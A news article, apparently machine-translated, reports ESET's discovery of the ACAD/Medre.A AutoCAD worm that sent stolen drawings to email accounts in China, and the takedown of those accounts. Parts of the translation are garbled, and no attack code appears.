Industrial spy worm that transmits design data and blueprints made in AutoCAD to China appears


A worm like an industrial spy has been confirmed that infects and diffuses the AutoCAD template file and sneaks out the files such as the designed data secretly to the 43 e-mail addresses of China. Although it is not specified who the criminal is, it is reported that deletion of the relay account has been completed and no further damage will be made.

AutoCAD Worm Stealing Designs, Blueprints | threatpost

ACAD / Medre.A - 10000's of AutoCAD files leaked in suspected industrial espionage | ESET ThreatBlog

The name of this worm is "ACAD / Medre.A", it took six months to get to the experts' observation network first.

ACDA / Medre.A was written in the script language AutoLISP used in AutoCAD products, and VisualBasic scripts were also used for individual actions. When it infected a new machine, the worm rewritten the AutoCAD settings and sent the saved data etc. to a total of 43 accounts in China's ISP "" and "" .

According to the ESET survey, many of the infection targets are in Peru, but there are other infectious cases seen in other Latin American countries like Ecuador, as well as in the United States and China.

Infected country classification, mostly in Peru, followed by Ecuador, Colombia and Latin American countries.

The type of stolen file. In addition to blueprints and projects, desktops, "Adnimistrator" folders and other information are pulled out.

A sample has been delivered to the Kaspersky Laboratory, as well as Dimitrie Vestujev, who is a leader in the global research and analysis team in Kaspersky Lab in Latin America, this worm persistently aimed at specific countries and companies only Make an attackAPT (Advanced persistent threat)I am not analyzing that attacks are not controlled at all. According to Bethujeff, it seems that this attack does not seem to receive support from some government. By the way, it seems that companies submitting AutoCAD also submitted samples.

RAR file sent from infected machine

The DXF file included in this RAR file contains data to make it possible to use the stolen data in the correct environment

ESET contacted Tencent who is the administrator of "" and investigated the mail account, and it seems that the inbox had been getting down with over 100,000 emails. The contents of that mass mail is said to be "an inbox of the final recipient is full" and there are about 5000 unmailed mails in the outbox.

Evidence of sending AutoCAD's drawing file (. Dwg)

Tencent quickly deleted these accounts in response to contact from ESET, and CVERC (China Computer Virus Emergency Response Center) also cooperated in deleting accounts, he said that he could have prevented further information leakage .

ACDA / Medre.A is targeting AutoCAD version 14.0 to 19.2, and it is thought that it will also work in future releases.

In response to contact from ESET, Autodesk, the developer of AutoCAD, has decided to fully support this problem.

in Note, Posted by logc_nt